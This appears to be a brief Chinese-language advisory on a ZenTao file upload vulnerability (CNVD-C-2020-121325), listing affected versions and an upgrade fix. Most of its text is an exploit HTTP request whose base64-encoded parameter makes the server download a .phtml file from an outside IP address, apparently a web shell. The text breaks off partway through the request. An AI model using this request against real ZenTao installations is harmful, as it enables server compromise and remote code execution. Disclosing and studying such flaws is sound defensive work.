CNVD-C-2020-121325文件上传漏洞主要影响以下禅道版本: 禅道开源版<=12.4.2,建议升级到禅道12.4.3以上版本 利用条件:需要后台权限 Copy GET /zentao/client-download-1-aHR0cDovLzEyMC43OC4xMjkuMjA5OjgwODEveC5waHRtbA==-macOSzip1.html HTTP/1.1Host: 127.0.0.1:8012User-Agent: Mozilla/5.0 (Android 9.0;...